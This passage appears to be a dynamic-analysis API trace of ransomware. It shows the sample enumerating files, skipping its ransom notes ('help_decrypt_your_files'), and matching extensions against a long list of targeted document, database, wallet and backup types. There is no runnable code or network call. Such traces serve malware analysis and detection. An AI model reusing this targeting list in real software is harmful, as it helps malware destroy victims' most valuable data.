	[0167.713] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", cchLength=0x60 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 0x60
	[0167.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.714] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.714] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"
	[0167.714] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96
	[0167.714] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.714] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.714] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.715] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.715] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x0, cFileName="pictures.ico", cAlternateFileName="")) returned 1
	[0167.715] lstrcmpW (lpString1="pictures.ico", lpString2="..") returned 1
	[0167.715] lstrcmpW (lpString1="pictures.ico", lpString2=".") returned 1
	[0167.715] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.715] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="pictures.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"
	[0167.715] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98
	[0167.716] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.716] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", cchLength=0x62 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 0x62
	[0167.716] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.716] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.716] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico"
	[0167.716] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 98
	[0167.716] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.717] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.717] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.717] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.717] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.717] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5029494e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5029494e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5029494e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x0, cFileName="resource.xml", cAlternateFileName="")) returned 1
	[0167.717] lstrcmpW (lpString1="resource.xml", lpString2="..") returned 1
	[0167.718] lstrcmpW (lpString1="resource.xml", lpString2=".") returned 1
	[0167.718] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.718] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="resource.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"
	[0167.718] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98
	[0167.718] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.718] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", cchLength=0x62 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 0x62
	[0167.723] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.723] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.723] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"
	[0167.723] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 98
	[0167.723] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.724] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.724] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.724] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cd